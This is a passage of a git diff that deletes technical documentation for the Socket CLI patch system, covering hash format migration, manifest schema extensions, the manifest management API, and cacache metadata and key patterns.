'../src/utils/patch-hash.mts' - -const content = Buffer.from('hello world\n') -const legacyHash = 'git-sha256-0bd69098bd9b9cc5934a610ab65da429b525361147faa7b5b922919e9a23143d' - -const ssriHash = normalizeToSsri(content, legacyHash) -// Returns: 'sha256-qUiQTy8PR5uPgZdpSzAYSw0u0cHNKh7A+4XSmaGSpEc=' -``` - -### Computing New Hashes -```typescript -import { computeSsri } from '../src/utils/patch-hash.mts' - -const content = Buffer.from('hello world\n') - -const sha256Hash = computeSsri(content) -// Returns: 'sha256-qUiQTy8PR5uPgZdpSzAYSw0u0cHNKh7A+4XSmaGSpEc=' - -const sha512Hash = computeSsri(content, 'sha512') -// Returns: 'sha512-...' -``` - -## Migration Strategy - -When reading existing manifests: -1. Detect hash format using `detectHashFormat()` -2. Validate hash using `validateHash()` -3. Convert legacy git-sha256 to ssri using `normalizeToSsri()` -4. 
Write back manifest with new ssri hashes - -## Hash Format Comparison - -| Format | Example | Use Case | -|--------|---------|----------| -| ssri (sha256) | `sha256-qUiQTy8PR5uPgZdpSzAYSw0u0cHNKh7A+4XSmaGSpEc=` | New patches, compatible with npm/pnpm/yarn lockfiles | -| ssri (sha512) | `sha512-7iaw3Ur350mqGo7jwQrpkj9hiYB3Lkc/iBml1JQODbJ6wYX4oOHV+E+IvIh/1nsUNzLDBMxfqa2Ob1f1ACio/w==` | Higher security requirements | -| git-sha256 | `git-sha256-0bd69098bd9b9cc5934a610ab65da429b525361147faa7b5b922919e9a23143d` | Legacy patches, GitHub compatibility | - -## Key Differences - -### Git SHA Format -- Includes `blob \0` prefix before hashing -- Used by Git for object storage -- Supports both SHA-1 (40 hex) and SHA-256 (64 hex) - -### ssri Format -- Pure content hash (no prefix) -- W3C Subresource Integrity standard -- Base64 encoded -- Self-describing with algorithm prefix - -## Transition Period - -During transition from git-sha256 to ssri: -- **Read**: Support both formats -- **Write**: Always use ssri format -- **Validate**: Accept both formats -- **Convert**: Normalize legacy hashes to ssri on read diff --git a/docs/technical/manifest-extensions.md b/docs/technical/manifest-extensions.md deleted file mode 100644 index 5fd52998c..000000000 --- a/docs/technical/manifest-extensions.md +++ /dev/null @@ -1,475 +0,0 @@ -# Socket Manifest Extensions - -## Current Schema - -```json -{ - "patches": { ... } -} -``` - -## Potential Extensions - -### 1. Schema Version (RECOMMENDED) - -**Problem**: Need to handle schema evolution -**Solution**: Add version field - -```json -{ - "version": "1.0.0", - "patches": { ... } -} -``` - -**Benefits**: -- Graceful schema migration -- Backward compatibility detection -- Clear error messages for old clients - -**Usage**: -```typescript -if (manifest.version !== CURRENT_VERSION) { - await migrateManifest(manifest) -} -``` - ---- - -### 2. 
Overrides/Registry Configuration - -**Problem**: Projects may want to force specific package versions or Socket registry packages -**Solution**: Centralized override configuration - -```json -{ - "version": "1.0.0", - "patches": { ... }, - "overrides": { - "lodash": "npm:@socketregistry/lodash@4.17.21", - "minimatch": "npm:@socketregistry/minimatch@9.0.5" - } -} -``` - -**Benefits**: -- Team shares same override configuration -- Committed to git (reproducible builds) -- Works with npm/pnpm/yarn overrides -- Can be auto-applied by socket-cli - -**Related**: This is similar to what's in socket-registry's package.json `pnpm.overrides` - ---- - -### 3. Ignored Vulnerabilities - -**Problem**: Some vulnerabilities may be false positives or not applicable -**Solution**: Document why vulnerabilities are ignored - -```json -{ - "version": "1.0.0", - "patches": { ... }, - "ignored": { - "GHSA-xxxx-yyyy-zzzz": { - "reason": "False positive - we don't use this code path", - "ignoredBy": "developer@example.com", - "ignoredAt": "2025-01-14T12:00:00Z", - "expiresAt": "2025-04-14T12:00:00Z" - } - } -} -``` - -**Benefits**: -- Document why vulnerabilities are ignored -- Temporary ignores with expiration -- Audit trail (who/when/why) - ---- - -### 4. Policy Configuration - -**Problem**: Teams want consistent security policies -**Solution**: Store Socket policy settings - -```json -{ - "version": "1.0.0", - "patches": { ... }, - "policy": { - "alertThreshold": "high", - "blockOnCritical": true, - "autoApplyPatches": false, - "allowedLicenses": ["MIT", "Apache-2.0", "BSD-3-Clause"] - } -} -``` - -**Benefits**: -- Consistent CI behavior across team -- Policy as code (versioned, reviewed) -- Override Socket API defaults per-project - ---- - -### 5. Applied Overrides History - -**Problem**: Track when overrides were applied vs. just configured -**Solution**: Record override application - -```json -{ - "version": "1.0.0", - "patches": { ... }, - "overrides": { ... 
}, - "appliedOverrides": { - "npm:lodash@4.17.20": { - "replacedWith": "npm:@socketregistry/lodash@4.17.21", - "appliedAt": "2025-01-14T12:00:00Z", - "reason": "Security hardening" - } - } -} -``` - -**Benefits**: -- Audit trail of package replacements -- Understand what changed and why -- Rollback information - ---- - -### 6. Metadata / Project Info - -**Problem**: Socket CLI needs project context -**Solution**: Store project metadata - -```json -{ - "version": "1.0.0", - "metadata": { - "projectName": "my-app", - "orgSlug": "my-company", - "lastScanAt": "2025-01-14T12:00:00Z", - "socketVersion": "1.1.25" - }, - "patches": { ... } -} -``` - -**Benefits**: -- Remember org slug (no need to pass --org every time) -- Track when project was last scanned -- Detect if manifest created with old CLI version - ---- - -### 7. Custom Scripts / Hooks - -**Problem**: Projects may need pre/post patch actions -**Solution**: Define lifecycle hooks - -```json -{ - "version": "1.0.0", - "patches": { ... }, - "hooks": { - "prePatch": "npm run lint", - "postPatch": "npm test", - "preRestore": "npm run backup", - "postRestore": "npm install" - } -} -``` - -**Benefits**: -- Run tests after patching -- Rebuild after restore -- Project-specific workflows - ---- - -### 8. Dependencies Metadata - -**Problem**: Track which dependencies have known issues -**Solution**: Document dependency status - -```json -{ - "version": "1.0.0", - "patches": { ... }, - "dependencies": { - "npm:lodash@4.17.20": { - "knownVulnerabilities": ["GHSA-xxxx-yyyy-zzzz"], - "patchAvailable": true, - "lastCheckedAt": "2025-01-14T12:00:00Z" - } - } -} -``` - -**Benefits**: -- Quick lookup of package status -- Avoid re-scanning on every run -- Show staleness (when last checked) - ---- - -### 9. Rollback Information - -**Problem**: Need to undo patches sometimes -**Solution**: Track patch history - -```json -{ - "version": "1.0.0", - "patches": { ... 
}, - "history": [ - { - "action": "apply", - "purl": "npm:lodash@4.17.20", - "uuid": "abc-123", - "timestamp": "2025-01-14T12:00:00Z", - "appliedBy": "developer@example.com" - }, - { - "action": "remove", - "purl": "npm:lodash@4.17.20", - "uuid": "abc-123", - "timestamp": "2025-01-15T09:00:00Z", - "removedBy": "developer@example.com" - } - ] -} -``` - -**Benefits**: -- Audit trail of all patch operations -- Understand who made changes -- Debug patch issues - ---- - -## Recommended Initial Extensions - -For **Phase 1.2**, I recommend adding: - -### Minimal Schema - -```json -{ - "version": "1.0.0", - "patches": { ... } -} -``` - -**Just add version field for future compatibility.** - -### Enhanced Schema (Optional) - -```json -{ - "version": "1.0.0", - "metadata": { - "orgSlug": "my-company", - "createdAt": "2025-01-14T12:00:00Z", - "updatedAt": "2025-01-14T12:00:00Z" - }, - "patches": { ... } -} -``` - -**Add basic metadata for convenience.** - ---- - -## Integration with Existing Tools - -### npm/pnpm/yarn Overrides - -Socket manifest could **generate** package manager configs: - -```bash -# Read .socket/manifest.json overrides -socket sync overrides - -# Generates pnpm-lock.yaml overrides section -# Generates package.json pnpm.overrides -# Generates .yarnrc.yml resolutions -``` - -### Socket Registry Integration - -Projects using socket-registry could share override preferences: - -```json -{ - "version": "1.0.0", - "patches": { ... 
}, - "registry": { - "prefer": "socket", - "packages": { - "lodash": "@socketregistry/lodash", - "minimatch": "@socketregistry/minimatch" - } - } -} -``` - ---- - -## What Should NOT Go in Manifest - -❌ **Developer-specific settings** -- Local file paths -- Personal API tokens -- Editor preferences - -→ These go in `~/.socketrc` or environment variables - -❌ **Large binary data** -- Patch tarballs -- Backup files -- Build artifacts - -→ These go in cacache or ignored directories - -❌ **Transient state** -- Current download progress -- Temporary locks -- Cache timestamps - -→ These go in memory or temp files - -❌ **Sensitive information** -- API keys -- Credentials -- Private URLs - -→ These go in `.env` or secrets management - ---- - -## Decision Framework - -**Should this go in manifest?** - -Questions to ask: -1. ✅ Should this be committed to git? -2. ✅ Should the whole team see it? -3. ✅ Is it project-specific (not developer-specific)? -4. ✅ Does it affect reproducible builds? -5. ✅ Is it human-readable JSON? - -If all "yes" → Consider adding to manifest - ---- - -## Example: Full Featured Manifest - -```json -{ - "version": "1.0.0", - "metadata": { - "projectName": "my-app", - "orgSlug": "my-company", - "createdAt": "2025-01-14T12:00:00Z", - "updatedAt": "2025-01-14T14:30:00Z" - }, - "patches": { - "npm:lodash@4.17.20": { - "uuid": "abc-123", - "exportedAt": "2025-01-14T12:00:00Z", - "files": { ... }, - "vulnerabilities": { ... 
}, - "description": "Fixes command injection", - "license": "MIT", - "tier": "free" - } - }, - "overrides": { - "minimatch": "npm:@socketregistry/minimatch@9.0.5" - }, - "ignored": { - "GHSA-false-positive-123": { - "reason": "Not applicable to our use case", - "ignoredBy": "security-team@example.com", - "ignoredAt": "2025-01-14T12:00:00Z", - "expiresAt": "2025-04-14T12:00:00Z" - } - }, - "policy": { - "alertThreshold": "high", - "blockOnCritical": true - } -} -``` - ---- - -## My Recommendation - -**Start simple, extend later:** - -### Phase 1.2 (Now) -```json -{ - "version": "1.0.0", - "patches": { ... } -} -``` - -### Phase 2 (Soon) -```json -{ - "version": "1.0.0", - "metadata": { - "orgSlug": "...", - "updatedAt": "..." - }, - "patches": { ... } -} -``` - -### Phase 3 (Future) -```json -{ - "version": "1.0.0", - "metadata": { ... }, - "patches": { ... }, - "overrides": { ... }, - "ignored": { ... } -} -``` - -**Rationale**: -- Version field enables future extensions -- Add features as they're needed -- Keep manifest focused on patches initially - ---- - -## Implementation Note - -Use **optional fields** with Zod: - -```typescript -export const PatchManifestSchema = z.object({ - version: z.string().default("1.0.0"), - metadata: z.object({ - orgSlug: z.string().optional(), - createdAt: z.string().optional(), - updatedAt: z.string().optional(), - }).optional(), - patches: z.record(z.string(), PatchRecordSchema), - overrides: z.record(z.string(), z.string()).optional(), - ignored: z.record(z.string(), IgnoredVulnerabilitySchema).optional(), -}) -``` - -This allows: -- Old manifests still valid (no version field) -- New features opt-in (optional) -- Graceful degradation diff --git a/docs/technical/manifest-management.md b/docs/technical/manifest-management.md deleted file mode 100644 index 277bd86f4..000000000 --- a/docs/technical/manifest-management.md +++ /dev/null @@ -1,556 +0,0 @@ -# Socket Manifest Management - -## Overview - -The manifest management system 
provides a complete API for managing `.socket/manifest.json`, the file that tracks all patches applied to a project. It lives in the project repository and should be committed to version control. - -## Implementation - -**Module**: `src/utils/manifest/patches/index.mts` - -### Core Features - -- **Zod schema validation** - Ensures manifest integrity -- **Version support** - Schema versioning for future migrations -- **Atomic writes** - Temp file + rename prevents corruption -- **Concurrent safety** - Operation queueing prevents race conditions -- **TypeScript types** - Full type safety with exported types - -## API Reference - -### Types - -```typescript -export type PatchFile = { - beforeHash: string // ssri format: sha256-base64 - afterHash: string // ssri format: sha256-base64 -} - -export type Vulnerability = { - cves: string[] // CVE IDs - summary: string // One-line description - severity: string // LOW | MEDIUM | HIGH | CRITICAL - description: string // Full explanation -} - -export type PatchRecord = { - uuid: string // UUID v4 - exportedAt: string // ISO 8601 timestamp - files: Record<string, PatchFile> // Path → hash info - vulnerabilities: Record<string, Vulnerability> - description: string // Patch description - license: string // SPDX identifier - tier: string // "free" | "premium" -} - -export type PatchManifest = { - version?: string // Schema version (default: "1.0.0") - patches: Record<string, PatchRecord> // PURL → patch record -} -``` - -### Core Functions - -#### readManifest(cwd?) - -Read and validate the patch manifest.
- -```typescript -const manifest = await readManifest() -console.log('Applied patches:', Object.keys(manifest.patches).length) -``` - -**Returns**: `PatchManifest` - Parsed and validated manifest, or empty manifest if file doesn't exist - -**Parameters**: -- `cwd?` - Working directory (defaults to `process.cwd()`) - -**Notes**: -- Returns empty manifest with version "1.0.0" if file doesn't exist -- Validates against Zod schema -- Throws on invalid JSON or schema violations - -#### writeManifest(manifest, cwd?) - -Write the patch manifest to disk with validation. - -```typescript -const manifest = await readManifest() -manifest.patches['npm:lodash@4.17.20'] = patchRecord -await writeManifest(manifest) -``` - -**Parameters**: -- `manifest` - Manifest to write -- `cwd?` - Working directory (defaults to `process.cwd()`) - -**Notes**: -- Validates before writing -- Uses atomic write (temp file + rename) -- Creates parent directory if needed -- Formats JSON with 2-space indentation - -#### addPatch(purl, patchRecord, cwd?) - -Add a patch to the manifest. - -```typescript -await addPatch('npm:lodash@4.17.20', { - uuid: '123e4567-e89b-12d3-a456-426614174000', - exportedAt: new Date().toISOString(), - files: { - 'node_modules/lodash/index.js': { - beforeHash: 'sha256-qUiQTy8...', - afterHash: 'sha256-9f8e7d6...', - }, - }, - vulnerabilities: { ... }, - description: 'Fixes command injection', - license: 'MIT', - tier: 'free' -}) -``` - -**Parameters**: -- `purl` - Package URL (e.g., "npm:lodash@4.17.20") -- `patchRecord` - Patch record to add -- `cwd?` - Working directory - -**Notes**: -- If patch already exists for this PURL, it will be replaced -- Operation is queued to prevent race conditions -- Creates manifest file if it doesn't exist - -#### removePatch(purl, cwd?) - -Remove a patch from the manifest. 
- -```typescript -const removed = await removePatch('npm:lodash@4.17.20') -if (removed) { - console.log('Patch removed from manifest') -} -``` - -**Returns**: `boolean` - True if patch was removed, false if it didn't exist - -**Parameters**: -- `purl` - Package URL to remove -- `cwd?` - Working directory - -#### getPatch(purl, cwd?) - -Get a specific patch record from the manifest. - -```typescript -const patch = await getPatch('npm:lodash@4.17.20') -if (patch) { - console.log('Patch UUID:', patch.uuid) - console.log('Files patched:', Object.keys(patch.files).length) -} -``` - -**Returns**: `PatchRecord | undefined` - Patch record or undefined if not found - -**Parameters**: -- `purl` - Package URL to query -- `cwd?` - Working directory - -#### listPatches(cwd?) - -List all PURLs that have patches applied. - -```typescript -const purls = await listPatches() -console.log('Applied patches:') -for (const purl of purls) { - console.log(` - ${purl}`) -} -``` - -**Returns**: `string[]` - Array of PURLs - -**Parameters**: -- `cwd?` - Working directory - -#### hasPatch(purl, cwd?) - -Check if a patch is applied for a specific package. - -```typescript -if (await hasPatch('npm:lodash@4.17.20')) { - console.log('Patch already applied') -} -``` - -**Returns**: `boolean` - True if patch is applied - -**Parameters**: -- `purl` - Package URL to check -- `cwd?` - Working directory - -#### getAllPatches(cwd?) - -Get all patch records from the manifest. - -```typescript -const patches = await getAllPatches() -for (const [purl, patch] of Object.entries(patches)) { - console.log(`${purl}: ${patch.description}`) -} -``` - -**Returns**: `Record<string, PatchRecord>` - Object mapping PURLs to patch records - -**Parameters**: -- `cwd?` - Working directory - -#### validateManifest(cwd?) - -Validate that the manifest file is valid.
- -```typescript -if (!await validateManifest()) { - console.error('Manifest validation failed') -} -``` - -**Returns**: `boolean` - True if valid - -**Parameters**: -- `cwd?` - Working directory - -#### migrateHashes(cwd?) - -Detect legacy hash formats in the manifest. - -```typescript -const migrated = await migrateHashes() -console.log(`Found ${migrated} legacy hashes`) -``` - -**Returns**: `number` - Number of legacy hashes detected - -**Parameters**: -- `cwd?` - Working directory - -**Notes**: -- Currently only detects legacy `git-sha256-*` format -- Does not perform actual conversion (requires re-reading files) -- Logs warnings for each legacy hash found - -## Manifest File Format - -### Location - -`.socket/manifest.json` (in project root) - -### Schema - -```json -{ - "version": "1.0.0", - "patches": { - "": { - "uuid": "", - "exportedAt": "", - "files": { - "": { - "beforeHash": "sha256-...", - "afterHash": "sha256-..." - } - }, - "vulnerabilities": { - "": { - "cves": ["CVE-..."], - "summary": "...", - "severity": "HIGH", - "description": "..." - } - }, - "description": "...", - "license": "MIT", - "tier": "free" - } - } -} -``` - -### Complete Example - -```json -{ - "version": "1.0.0", - "patches": { - "npm:lodash@4.17.20": { - "uuid": "123e4567-e89b-12d3-a456-426614174000", - "exportedAt": "2025-01-14T12:00:00Z", - "files": { - "node_modules/lodash/lodash.js": { - "beforeHash": "sha256-qUiQTy8PR5uPgZdpSzAYSw0u0cHNKh7A+4XSmaGSpEc=", - "afterHash": "sha256-9f8e7d6c5b4a3210fedcba9876543210abcdef12345=" - }, - "node_modules/lodash/package.json": { - "beforeHash": "sha256-abc123def456...", - "afterHash": "sha256-xyz789ghi012..." - } - }, - "vulnerabilities": { - "GHSA-jrhj-2j3q-xf3v": { - "cves": ["CVE-2021-23337"], - "summary": "Command injection in lodash", - "severity": "HIGH", - "description": "Lodash versions prior to 4.17.21 are vulnerable..." 
- } - }, - "description": "Fixes command injection vulnerability in template function", - "license": "MIT", - "tier": "free" - } - } -} -``` - -## Concurrency Safety - -The manifest management system handles concurrent operations safely: - -- **Operation queueing**: All write operations are queued per working directory -- **Atomic reads**: Manifest is re-read before each update -- **No race conditions**: Promise chaining ensures correct ordering - -```typescript -// Safe to call concurrently - operations will be queued -await Promise.all([ - addPatch('npm:lodash@4.17.20', patch1), - addPatch('npm:express@4.17.1', patch2), - removePatch('npm:minimatch@3.0.4'), -]) -``` - -### Implementation Details - -```typescript -// Operation queue to ensure sequential manifest writes -const manifestOperations = new Map<string, Promise<unknown>>() - -async function queueOperation<T>( - cwd: string, - operation: () => Promise<T>, -): Promise<T> { - const key = cwd || process.cwd() - const previousOperation = manifestOperations.get(key) || Promise.resolve() - - const currentOperation = previousOperation.then( - () => operation(), - () => operation(), // Run even if previous failed - ) - - manifestOperations.set(key, currentOperation) - - try { - return await currentOperation - } finally { - if (manifestOperations.get(key) === currentOperation) { - manifestOperations.delete(key) - } - } -} -``` - -## Usage Examples - -### Complete Patch Flow - -```typescript -import { - addPatch, - getPatch, - hasPatch, - removePatch, -} from './utils/manifest/patches/index.mts' - -const purl = 'npm:lodash@4.17.20' - -// Check if patch already applied -if (await hasPatch(purl)) { - console.log('Patch already applied') - return -} - -// Apply patch -await addPatch(purl, { - uuid: '123e4567-e89b-12d3-a456-426614174000', - exportedAt: new Date().toISOString(), - files: { ... }, - vulnerabilities: { ...
}, - description: 'Fixes command injection', - license: 'MIT', - tier: 'free' -}) - -console.log('Patch applied successfully') - -// Later: remove patch -const removed = await removePatch(purl) -if (removed) { - console.log('Patch removed') -} -``` - -### List All Patches - -```typescript -import { listPatches, getPatch } from './utils/manifest/patches/index.mts' - -const purls = await listPatches() - -console.log(`Found ${purls.length} applied patches:\n`) - -for (const purl of purls) { - const patch = await getPatch(purl) - console.log(`${purl}:`) - console.log(` UUID: ${patch!.uuid}`) - console.log(` Description: ${patch!.description}`) - console.log(` Files: ${Object.keys(patch!.files).length}`) - console.log(` Vulnerabilities: ${Object.keys(patch!.vulnerabilities).length}`) - console.log() -} -``` - -### Validate Manifest - -```typescript -import { validateManifest } from './utils/manifest/patches/index.mts' - -if (!await validateManifest()) { - console.error('Manifest validation failed!') - console.error('Please check .socket/manifest.json for errors') - process.exit(1) -} - -console.log('Manifest is valid') -``` - -### Detect Legacy Hashes - -```typescript -import { migrateHashes } from './utils/manifest/patches/index.mts' - -const legacyCount = await migrateHashes() - -if (legacyCount > 0) { - console.warn(`Found ${legacyCount} legacy hash format(s)`) - console.warn('Consider re-applying patches to use current ssri format') -} -``` - -## Error Handling - -Functions follow consistent error handling patterns: - -```typescript -// Returns undefined for missing data -const patch = await getPatch('non-existent-purl') -// patch === undefined - -// Returns false for failed operations -const removed = await removePatch('non-existent-purl') -// removed === false - -// Throws for filesystem errors, validation errors, etc. 
-try { - await writeManifest(invalidManifest) -} catch (error) { - console.error('Failed to write manifest:', error.message) -} -``` - -## Testing - -**Test suite**: `src/utils/manifest/patches/index.test.mts` -**Coverage**: 37 tests covering all core functionality - -Run tests: -```bash -pnpm exec vitest run src/utils/manifest/patches/index.test.mts -``` - -### Test Coverage - -- **readManifest**: 5 tests (missing file, existing file, defaults, validation) -- **writeManifest**: 5 tests (creation, directories, validation, formatting, overwrite) -- **addPatch**: 4 tests (empty manifest, multiple patches, replacement, creation) -- **removePatch**: 3 tests (existing, non-existent, selective) -- **getPatch**: 3 tests (existing, non-existent, multiple) -- **listPatches**: 3 tests (empty, multiple, after removal) -- **hasPatch**: 3 tests (existing, non-existent, after removal) -- **getAllPatches**: 2 tests (empty, multiple) -- **migrateHashes**: 3 tests (no legacy, legacy detection, empty) -- **validateManifest**: 4 tests (valid, non-existent, invalid, structure) -- **concurrent operations**: 2 tests (multiple adds, mixed operations) - -## Schema Versioning - -The manifest includes a `version` field to support future schema migrations: - -```json -{ - "version": "1.0.0", - "patches": { ... } -} -``` - -### Current Version: 1.0.0 - -- Initial schema with PURL-keyed patches -- Each patch has: uuid, exportedAt, files, vulnerabilities, description, license, tier -- File hashes in ssri format (sha256-base64) - -### Future Versions - -When the schema changes, increment the version and add migration logic: - -```typescript -const manifest = await readManifest() - -if (manifest.version !== CURRENT_VERSION) { - // Migration logic here - manifest = await migrateManifest(manifest) -} -``` - -See [socket-manifest-extensions.md](./socket-manifest-extensions.md) for proposed future extensions. - -## Best Practices - -1. 
**Always use the API** - Don't manually edit `.socket/manifest.json` -2. **Commit the manifest** - It's the source of truth for your team -3. **Validate after changes** - Use `validateManifest()` to catch errors -4. **Use ssri hashes** - New patches should use sha256-base64 format -5. **Concurrent operations** - The API handles queueing automatically - -## Integration with Backup System - -The manifest management system works alongside the backup system: - -| Aspect | Manifest | Backup Metadata | -|--------|----------|-----------------| -| **Location** | `.socket/manifest.json` | `~/.socket/_patches/manifests/.json` | -| **Committed** | Yes (in git) | No (local only) | -| **Purpose** | Patch records | Backup metadata | -| **Scope** | All patches | Single patch | -| **Contains** | Vulnerability info | Backup file info | - -**Workflow**: -1. Create backup using `patch-backup.mts` → local backup metadata -2. Add patch using `patch-manifest.mts` → committed manifest -3. Team members clone repo → manifest is shared -4. 
Restore backup using `patch-backup.mts` → uses local backup metadata - -## Related Documentation - -- [Socket Manifest Format](./socket-manifest-format.md) - Detailed format specification -- [Socket Manifest Extensions](./socket-manifest-extensions.md) - Proposed extensions -- [Patch Backup System](./patch-backup-system.md) - Backup/restore functionality -- [Socket Patch Implementation Plan](./socket-patch-implementation-plan.md) - Overall plan diff --git a/docs/technical/metadata-files.md b/docs/technical/metadata-files.md deleted file mode 100644 index 889a6b319..000000000 --- a/docs/technical/metadata-files.md +++ /dev/null @@ -1,233 +0,0 @@ -# Why We Need Metadata Files (Not Just Cacache) - -## The Question - -**Why can't we just glob cacache keys like `socket:patch:backup:abc-123:*` to find all backups for a patch?** - -## The Answer: Keys Are Cryptographically Hashed - -### What You Might Expect (But Doesn't Happen) - -``` -~/.socket/_cacache/keys/ -├── socket:patch:backup:abc-123:hash1 -├── socket:patch:backup:abc-123:hash2 -├── socket:patch:backup:abc-123:hash3 -└── socket:patch:backup:xyz-789:hash1 -``` - -Then you could: `ls ~/.socket/_cacache/keys/socket:patch:backup:abc-123:*` - -### What Actually Happens - -Cacache **hashes each key** to create a file path: - -``` -Key: "socket:patch:backup:abc-123:hash1" - ↓ SHA-256 hash - "f9a050c918ad397764136710465e0b51fbde7d5f" - ↓ Bucket by first 4 chars -Path: index-v5/f9/a0/50c918ad397764136710465e0b51fbde7d5f -``` - -``` -Key: "socket:patch:backup:abc-123:hash2" - ↓ SHA-256 hash (COMPLETELY DIFFERENT) - "a43f91b2c83af49176d8e9f103bd2652" - ↓ Bucket by first 4 chars -Path: index-v5/a4/3f/91b2c83af49176d8e9f103bd2652 -``` - -**Result**: Keys with similar strings produce completely unrelated file paths! - -### Actual Disk Structure - -``` -~/.socket/_cacache/ -├── index-v5/ -│ ├── f9/a0/50c918ad... ← contains key "socket:patch:backup:abc-123:hash1" -│ ├── a4/3f/91b2c83a... 
← contains key "socket:patch:backup:abc-123:hash2" -│ ├── 7e/22/e53b1010... ← contains key "socket:patch:backup:abc-123:hash3" -│ └── d6/18/92f5b24c... ← contains key "socket:patch:backup:xyz-789:hash1" -└── content-v2/ - └── sha256/... -``` - -**You cannot glob these paths!** They're random with respect to the key string. - -## Why Cacache Does This - -### Design Goals: -1. **Scale to millions of entries** - Hash bucketing prevents huge directories -2. **Handle special characters** - Keys can have `/`, `:`, `?`, etc. - filesystem unsafe -3. **O(1) lookups** - Hash key → file path directly -4. **Atomic operations** - Write to temp, rename (filesystem atomic operation) -5. **Deduplication** - Content stored by hash, not by key - -### Trade-off: -- ✅ Fast exact key lookup: `O(1)` -- ❌ Pattern matching: `O(n)` - must scan all entries - -## How to Find Keys: cacache.ls() - -Cacache provides `cacache.ls()` but it's **expensive**: - -```typescript -import cacache from 'cacache' - -// This reads EVERY index file in the cache! -const allEntries = await cacache.ls('~/.socket/_cacache') -// Returns: { "key1": {...}, "key2": {...}, ... "keyN": {...} } - -// Filter in memory -const matchingKeys = Object.keys(allEntries) - .filter(key => key.startsWith('socket:patch:backup:abc-123:')) - -// For a cache with 10,000 entries, this reads 10,000 index files -// Just to find 3 keys for one patch! 
-``` - -**Performance**: -- 100 cache entries → Read 100 files to find 3 matches -- 1,000 cache entries → Read 1,000 files to find 3 matches -- 10,000 cache entries → Read 10,000 files to find 3 matches - -**This is O(n) where n = total cache size!** - -## Solution: Metadata Files - -Store a **small index file per patch**: - -### Metadata File: `~/.socket/_patches/manifests/abc-123.json` - -```json -{ - "uuid": "abc-123", - "appliedAt": "2025-01-14T12:00:00Z", - "files": { - "node_modules/lodash/index.js": { - "integrity": "sha256-qUiQTy8PR5uPgZdpSzAYSw0u0cHNKh7A+4XSmaGSpEc=", - "size": 12345 - }, - "node_modules/lodash/package.json": { - "integrity": "sha256-abc123...", - "size": 678 - } - } -} -``` - -### Operations Now: - -**List backups for patch**: -```typescript -// O(1) - Read one small JSON file -const metadata = JSON.parse( - await fs.readFile(`~/.socket/_patches/manifests/${uuid}.json`) -) -const filePaths = Object.keys(metadata.files) -// Result: ["node_modules/lodash/index.js", "node_modules/lodash/package.json"] -``` - -**Restore all backups**: -```typescript -// O(k) where k = files in this patch (not total cache size!) 
-for (const [path, info] of Object.entries(metadata.files)) { - const key = `socket:patch:backup:${uuid}:${hashPath(path)}` - const entry = await cacache.get(cacheDir, key, { - integrity: info.integrity // Verify on retrieval - }) - await fs.writeFile(path, entry.data) -} -``` - -**Cleanup patch**: -```typescript -// O(k) - Only delete this patch's entries -for (const path of Object.keys(metadata.files)) { - await cacache.rm.entry(cacheDir, `socket:patch:backup:${uuid}:${hashPath(path)}`) -} -await fs.unlink(`~/.socket/_patches/manifests/${uuid}.json`) -``` - -## Comparison - -| Operation | Without Metadata | With Metadata | -|-----------|------------------|---------------| -| List files for patch | O(n) - scan entire cache | O(1) - read one JSON file | -| Restore patch | O(n) - scan to find keys | O(k) - k = files in patch | -| Cleanup patch | O(n) - scan to find keys | O(k) - k = files in patch | -| Storage overhead | 0 bytes | ~1KB per patch | - -**Example**: Cache with 10,000 entries, restoring patch with 3 files: -- Without metadata: Read 10,000 index files -- With metadata: Read 1 JSON file + 3 cache entries - -## Additional Benefits of Metadata Files - -1. **Human-readable**: `cat ~/.socket/_patches/manifests/abc-123.json` -2. **Debuggable**: Easy to inspect what's backed up -3. **Browsable**: `ls ~/.socket/_patches/manifests/` shows all patches -4. **Grep-able**: `grep "lodash" ~/.socket/_patches/manifests/*.json` -5. **No race conditions**: Each patch has its own file -6. **Backup-friendly**: Small files, easy to sync/backup - -## Could We Use a Different Cacache Structure? 
- -### Option: Store metadata in cacache itself - -```typescript -// Metadata as cacache entry -await cacache.put(cacheDir, `socket:patch:meta:${uuid}`, JSON.stringify(metadata)) -``` - -**Still can't glob!** Same problem: -- `socket:patch:meta:abc-123` → hashed to random path -- `socket:patch:meta:xyz-789` → hashed to different random path -- Still need to scan entire cache to find all metadata entries - -### Option: Use SQLite for index - -```sql -CREATE TABLE patch_metadata ( - uuid TEXT PRIMARY KEY, - metadata JSON -); -``` - -**Pros**: Fast queries, proper indexes -**Cons**: -- More complex (need to manage database) -- Concurrent access requires locking -- Not the npm ecosystem standard -- Overkill for simple lookup table - -## Conclusion - -### Why 3 Storage Types: - -1. **Metadata** (filesystem JSON): - - Small index files (~1KB each) - - Fast O(1) lookups by UUID - - Human-readable and debuggable - - One file per patch - -2. **Cacache index** (hashed): - - Key → content integrity mapping - - Handled automatically by cacache - - Optimized for exact key lookups - -3. **Cacache content** (hashed by integrity): - - Actual file contents - - Deduplicated automatically - - Integrity verified on retrieval - -### The Architecture Makes Sense: - -✅ **Metadata** = Query layer (what we want to find) -✅ **Cacache** = Storage layer (where content lives) - -**Total cost**: ~1KB per patch for metadata -**Performance gain**: O(n) → O(1) for all patch operations - -This is the standard pattern used throughout the npm ecosystem! diff --git a/docs/technical/patch-cacache.md b/docs/technical/patch-cacache.md deleted file mode 100644 index b781bd3f2..000000000 --- a/docs/technical/patch-cacache.md +++ /dev/null @@ -1,366 +0,0 @@ -# Patch Cacache Key Patterns - -## Overview - -Socket patch system uses content-addressable caching via `cacache` and `ssri` for storing backups and downloads. 
- -## Using ssri Library - -We use the `ssri` package (pinned at v12.0.0) for all hash operations, following patterns from `pacote` and `cacache`. - -### Key ssri Functions - -```typescript -import ssri from 'ssri' - -// Compute integrity from data -const integrity = ssri.fromData(buffer, { algorithms: ['sha256'] }) -integrity.toString() // 'sha256-qUiQTy8PR5uPgZdpSzAYSw0u0cHNKh7A+4XSmaGSpEc=' - -// Validate data against integrity -const isValid = ssri.checkData(buffer, 'sha256-...') -// Returns Integrity object if valid, false if invalid - -// Parse integrity string -const parsed = ssri.parse('sha256-...') -parsed.hexDigest() // Get hex format of hash - -// Convert hex to ssri (e.g., from npm dist.shasum) -const fromHex = ssri.fromHex('abc123...', 'sha1') -fromHex.toString() // 'sha1-...' -``` - -## Cacache Key Patterns - -### 1. Backup Storage Pattern - -**Format**: `socket:patch:backup::` - -**Example**: -``` -socket:patch:backup:123e4567-e89b-12d3-a456-426614174000:a1b2c3d4e5f6g7h8 -``` - -**Usage**: -```typescript -import { put, get } from '@socketsecurity/registry/lib/cacache' -import ssri from 'ssri' -import crypto from 'node:crypto' - -// Hash the file path (for key uniqueness) 